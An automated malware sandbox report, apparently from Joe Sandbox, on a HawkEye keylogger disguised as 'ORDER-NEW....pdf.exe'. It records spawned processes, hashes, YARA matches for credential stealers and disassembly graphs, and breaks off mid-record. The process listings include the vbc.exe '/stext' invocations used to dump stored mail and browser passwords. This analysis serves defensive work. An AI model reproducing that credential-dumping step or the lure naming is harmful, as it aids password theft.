                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Users\user\Desktop\ORDER-NEW....pdf.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\ORDER-NEW....pdf.exe"
                                                                                                                                                                      Imagebase:0x7f0000
                                                                                                                                                                      File size:782848 bytes
                                                                                                                                                                      MD5 hash:1BAEC657210438B896934A7A793C204C
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:low

                                                                                                                                                                      General

                                                                                                                                                                      Start time:01:10:14
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                      Imagebase:0xcc0000
                                                                                                                                                                      File size:98912 bytes
                                                                                                                                                                      MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.933041044.0000000006FAE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Start time:01:10:19
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmp
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:1171592 bytes
                                                                                                                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.702441264.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.704117458.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.702788844.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000008.00000000.703279347.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:01:10:26
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
                                                                                                                                                                      Imagebase:0x160000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:01:10:28
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
                                                                                                                                                                      Imagebase:0x160000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:01:11:25
                                                                                                                                                                      Start date:21/01/2022
                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB202.tmp
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:1171592 bytes
                                                                                                                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, Description: Detects BabyShark KimJongRAT, Source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:14.8%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                        Signature Coverage:8.6%
                                                                                                                                                                        Total number of Nodes:58
                                                                                                                                                                        Total number of Limit Nodes:3
                                                                                                                                                                        execution_graph 10086 1216f70 10087 1216f82 10086->10087 10089 1216fa1 10087->10089 10090 1216c08 10087->10090 10091 1216c13 10090->10091 10092 12172db 10091->10092 10094 1216c24 10091->10094 10092->10089 10095 1217310 OleInitialize 10094->10095 10096 1217374 10095->10096 10096->10092 10097 1213b70 10100 1213c08 10097->10100 10101 1213c29 10100->10101 10102 1213b8a 10101->10102 10106 1213c60 10101->10106 10110 1213ccc 10101->10110 10115 1213c70 10101->10115 10107 1213c70 10106->10107 10119 1217e97 10107->10119 10111 1213c8a 10110->10111 10112 1213cda 10110->10112 10114 1217e97 SetProcessWorkingSetSize 10111->10114 10113 1213cc5 10113->10102 10114->10113 10116 1213c89 10115->10116 10118 1217e97 SetProcessWorkingSetSize 10116->10118 10117 1213cc5 10117->10102 10118->10117 10122 1217e9b 10119->10122 10120 1217f73 SetProcessWorkingSetSize 10121 1213cc5 10120->10121 10121->10102 10122->10120 10123 121ab80 10124 121abc6 DeleteFileW 10123->10124 10126 121abff 10124->10126 10127 1210448 10130 12104e9 10127->10130 10128 1210462 10131 1210512 10130->10131 10134 12104e9 2 API calls 10130->10134 10132 121096e 10131->10132 10137 1210d99 10131->10137 10141 1210da0 10131->10141 10132->10128 10133 1210949 10133->10128 10134->10131 10138 1210da0 VirtualProtect 10137->10138 10140 1210e23 10138->10140 10140->10133 10142 1210de8 VirtualProtect 10141->10142 10144 1210e23 10142->10144 10144->10133 10145 1216398 GetCurrentProcess 10146 1216412 GetCurrentThread 10145->10146 10147 121640b 10145->10147 10148 1216448 10146->10148 10149 121644f GetCurrentProcess 10146->10149 10147->10146 10148->10149 10150 1216485 10149->10150 10155 1216549 10150->10155 10159 1216928 10150->10159 10151 12164ad GetCurrentThreadId 10152 12164de 10151->10152 10156 12165bd DuplicateHandle 10155->10156 10158 1216552 10155->10158 10157 1216656 10156->10157 10157->10151 10158->10151 10160 1216946 10159->10160 10160->10151

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 012104E9 Relevance: 2.9, Strings: 2, Instructions: 399COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 41 12104e9-1210509 117 121050c call 12104e9 41->117 118 121050c call 1210988 41->118 42 1210512-121051b 43 1210538 42->43 44 121051d-1210524 42->44 47 121053a-1210585 43->47 45 121052a-1210536 44->45 46 121096e-12109ae 44->46 45->47 74 12109b4-12109da 46->74 50 1210632-121065e 47->50 51 121058b-121059f 47->51 68 1210661-1210669 50->68 53 12105a1-12105a5 51->53 54 12105cc-12105ce 51->54 55 12105a7-12105aa 53->55 56 12105ac 53->56 57 1210620-121062c 54->57 58 12105d0-12105d4 54->58 60 12105af-12105bb 55->60 56->60 57->50 57->51 62 12105d6-12105d9 58->62 63 12105db 58->63 65 12105c1 60->65 66 12105bd-12105bf 60->66 67 12105de-12105f6 62->67 63->67 69 12105c4-12105ca 65->69 66->69 67->57 71 12105f8-121061e 67->71 68->46 72 121066f-121067e 68->72 69->57 71->57 71->71 72->46 73 1210684-12106c4 72->73 73->68 75 12106c6-12106cf 73->75 75->46 76 12106d5-12106e4 75->76 76->46 78 12106ea-12106f9 76->78 78->46 79 12106ff-121070b 78->79 79->46 81 1210711-1210721 79->81 81->46 82 1210727-1210730 81->82 82->46 84 1210736-1210745 82->84 84->46 85 121074b-1210754 84->85 85->46 86 121075a-1210769 85->86 86->46 87 121076f-1210778 86->87 87->46 88 121077e-121078e 87->88 88->46 89 1210794-121079d 88->89 89->46 90 12107a3-12107b2 89->90 90->46 91 12107b8-12107c1 90->91 91->46 92 12107c7-12107d6 91->92 92->46 93 12107dc-12107e5 92->93 93->46 94 12107eb-12107fb 93->94 94->46 95 1210801-121080a 94->95 95->46 96 1210810-121081f 95->96 96->46 97 1210825-121082e 96->97 97->46 98 1210834-1210843 97->98 98->46 99 1210849-1210852 98->99 99->46 100 1210858-1210868 99->100 100->46 101 121086e-1210877 100->101 101->46 102 121087d-121088c 101->102 102->46 103 1210892-121089b 102->103 103->46 104 12108a1-12108b0 103->104 104->46 105 12108b6-12108bf 104->105 105->46 106 12108c5-12108d5 105->106 106->46 107 12108db-12108e4 106->107 107->46 108 12108ea-12108f9 107->108 108->46 109 12108fb-1210904 108->109 109->46 110 1210906-121090f 109->110 110->46 111 1210911-1210944 110->111 119 1210947 call 1210da0 111->119 120 1210947 call 1210d99 111->120 113 1210949-121094d 114 1210957-121096d 113->114 115 121094f-1210956 113->115 117->42 118->42 119->113 120->113
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: ~$@
                                                                                                                                                                        • API String ID: 0-3336456676
                                                                                                                                                                        • Opcode ID: f4ce057abe15d3a6c0ee324d987020efcaa5e8e17aaedcbfb8b88cf023d548c7
                                                                                                                                                                        • Instruction ID: f589903f9b92dc7123507187ccbe17c2ede12312e272a9f3b2a3e874d45b8811
                                                                                                                                                                        • Opcode Fuzzy Hash: f4ce057abe15d3a6c0ee324d987020efcaa5e8e17aaedcbfb8b88cf023d548c7
                                                                                                                                                                        • Instruction Fuzzy Hash: D6F10475E101198FDB14CF99C4909ADBBF2FF58710F25816AE915AB36AD331EC82CB84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 012118A0 Relevance: .6, Instructions: 610COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 66709761842dc3f3ab8a3c13479493ae560114774619347cc898e2e33e9f6b52
                                                                                                                                                                        • Instruction ID: 87058ebe44bb179c2e7b7ac5bb0242f5849848ae04f25c26aac4f6fd5c3e6097
                                                                                                                                                                        • Opcode Fuzzy Hash: 66709761842dc3f3ab8a3c13479493ae560114774619347cc898e2e33e9f6b52
                                                                                                                                                                        • Instruction Fuzzy Hash: BA429B31A10605CFCB24CF68C5849AEFBF2FF98310B198669D516AB659D730F981CF94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01210E70 Relevance: .5, Instructions: 467COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ff1e0e4af33c865d88605775496cb0471ad92e27ee44fec29d70729d44a5738b
                                                                                                                                                                        • Instruction ID: a1356d5ce7bdd5cde842789a96708fb950ae11a2d943e8a200b3458dc0c4ca02
                                                                                                                                                                        • Opcode Fuzzy Hash: ff1e0e4af33c865d88605775496cb0471ad92e27ee44fec29d70729d44a5738b
                                                                                                                                                                        • Instruction Fuzzy Hash: 79128E75E112199FCB14CFA8D5818AEBBF2FF99300F218165E615AB72AD730EC41CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01216367 Relevance: 6.1, APIs: 4, Instructions: 137threadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 012163F8
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 01216435
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01216472
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 012164CB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                        • Opcode ID: a0b7194e31e7ea10045b1aaf96418ea60f10aaa6babb56140a9d343dfe5ab7e3
                                                                                                                                                                        • Instruction ID: f492a9aec3182221f54c27a83cf431289391244ee8e59514a71418e6ae8fb691
                                                                                                                                                                        • Opcode Fuzzy Hash: a0b7194e31e7ea10045b1aaf96418ea60f10aaa6babb56140a9d343dfe5ab7e3
                                                                                                                                                                        • Instruction Fuzzy Hash: 8B5187B09003499FDB14CFA9C949BDEBFF5EF48314F24846AE419A7391DB789884CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01216398 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 012163F8
                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 01216435
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 01216472
                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 012164CB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2063062207-0
                                                                                                                                                                        • Opcode ID: 890680f2025f57d386a750b859362ff301407f7163a8fc6524b893f0face0e45
                                                                                                                                                                        • Instruction ID: a35d3218ff0f95d7206ebac40e5d1164052b426762967a2fe493f2401fc3adad
                                                                                                                                                                        • Opcode Fuzzy Hash: 890680f2025f57d386a750b859362ff301407f7163a8fc6524b893f0face0e45
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E5164B0900649DFDB14CFA9D548BDEBBF5EF48314F208469E419B7390DB785884CB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01216549 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 242 1216549-1216550 243 1216552-1216581 call 121632c 242->243 244 12165bd-1216654 DuplicateHandle 242->244 248 1216586-12165ac 243->248 246 1216656-121665c 244->246 247 121665d-121667a 244->247 246->247
                                                                                                                                                                        APIs
                                                                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01216647
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DuplicateHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3793708945-0
                                                                                                                                                                        • Opcode ID: e541e6e8aac3e4af6a6c26a3654c7d79a771309e881cc94614b51c97ce8bda35
                                                                                                                                                                        • Instruction ID: c93cc6371e6f05b8d18ccde6152e4d745b3fa2f653d09b087862da2068f757a4
                                                                                                                                                                        • Opcode Fuzzy Hash: e541e6e8aac3e4af6a6c26a3654c7d79a771309e881cc94614b51c97ce8bda35
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D414976900259DFCB01CF99D844ADEBFF9FB58310F14845AEA14A7360D335A954DFA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01217E97 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 253 1217e97-1217e99 254 1217eb6-1217ef7 call 1216c5c 253->254 255 1217e9b-1217ea0 253->255 268 1217f02 254->268 269 1217ef9 254->269 256 1217ea2-1217eb5 255->256 257 1217f1a-1217fa2 SetProcessWorkingSetSize 255->257 256->254 262 1217fa4-1217faa 257->262 263 1217fab-1217fbf 257->263 262->263 268->257 269->268
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetProcessWorkingSetSize.KERNEL32(?,?,?), ref: 01217F95
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.731173701.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_1210000_ORDER-NEW.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProcessSizeWorking
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3584180929-0
                                                                                                                                                                        • Opcode ID: 55a17648a42842166206e9fba3ba00bdb5c6ea04311e8c2cb78518ced7b00bc5
                                                                                                                                                                        • Instruction ID: 2b488645737743218976606eb3ec53736a252432362d5431f44e95d9b6ee0f11
                                                                                                                                                                        • Opcode Fuzzy Hash: 55a17648a42842166206e9fba3ba00bdb5c6ea04311e8c2cb78518ced7b00bc5
                                                                                                                                                                        • Instruction Fuzzy Hash: 8731AC71900209CFDB10CFA9C844BEEBBF4FB98324F104529E125A7390C7796944CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 01217308 Relevance: 1.6, APIs: 1, Instructions: 73comCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 270 1217308-121730b 272 1217310-1217372 OleInitialize 270->272 273 1217374-121737a 272->273 274 121737b-1217398 272->274 273->274
                                                                                                                                                                        APIs
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 01217365
                                                                                                                                                                        Memory Dump Source
